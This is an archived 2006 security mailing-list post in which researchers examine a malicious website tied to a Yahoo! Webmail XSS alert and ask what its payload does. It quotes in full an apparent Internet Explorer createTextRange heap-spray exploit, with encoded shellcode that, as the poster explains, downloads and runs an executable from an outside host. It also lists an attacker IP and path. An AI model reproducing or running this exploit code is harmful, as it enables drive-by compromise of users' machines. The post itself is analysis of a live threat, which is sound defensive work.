|
Dailydave
mailing list archives
RE: [Argeniss] Alert - Yahoo! Webmail XSS
From: "C programming List" <cprog.list () gmail com>
Date: Tue, 18 Apr 2006 17:54:23 -0400
The top page a level above that is quite interesting too. Although I'd only
recommend browsing it with wget and notepad, to be on the safe side. Should
someone perhaps notify all those banks mentioned? (Then again, telling them
"Watch out for suspicious CC transactions from eastern European nations"
probably isn't telling them anything they don't already know....)
cheers,
DaveK
Looking at the front page on my regular browsers(firefox, galeon,
konqueror) the 3 die, apparently from what I see, the browser
makes repetitive call to mmap2
mmap2(NULL, 524288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0) = 0x8af82000
I dont know what he wants, but apparently is just to map as much
memory as possible. Anyone knows what script he uses to generate this
?
THere is also http://www.w00tynetwork.com/news.htm which has what I
beleive is an IE explorer exploit, maybe another browser, but windows
oriented.
<head>
<meta http-equiv="refresh" content="2;url=news.htm">
</head>
<input type="checkbox" id="javascript">
<SCRIPT language="javascript">
shellcode = unescape(
"%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC" +
"%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0" +
"%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877" +
"%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0" +
"%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456" +
"%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D" +
"%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A" +
"%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC" +
"%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124" +
"%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000" +
"%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u6F61%u2E6C%u7865" +
"%u0065%u7468%u7074%u2F3A%u772F%u7777%u772E%u3030%u7974%u656E%u7774%u726F%u2E6B%u6F63%u2F6D%u6962%u616E%u7972%u2E32%u7865%u0065%u0000");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
while (bigblock.length < slackspace)
bigblock += bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length + slackspace < 0x40000)
block = block + block + fillblock;
memory = new Array();
for ( i = 0; i < 2020; i++ )
memory[i] = block + shellcode;
var r = document.getElementById('javascript').createTextRange();
</script>
This shellcode downloads and execs this binary
http://www.w00tynetwork.com/binary2.exe. Anyone knows what the binary
does ?
Ive tried to get the file that the xss is going to download but the
address never replies.
http://211.22.14.50/.yahoomail/x.htm
A whois on the address gives a comany named Ceraco International Co., Ltd.
Which I guess is s drone..
Anyone has any more on this web?
-daniel
 By Date 
By Thread
Current thread:
|
Intro
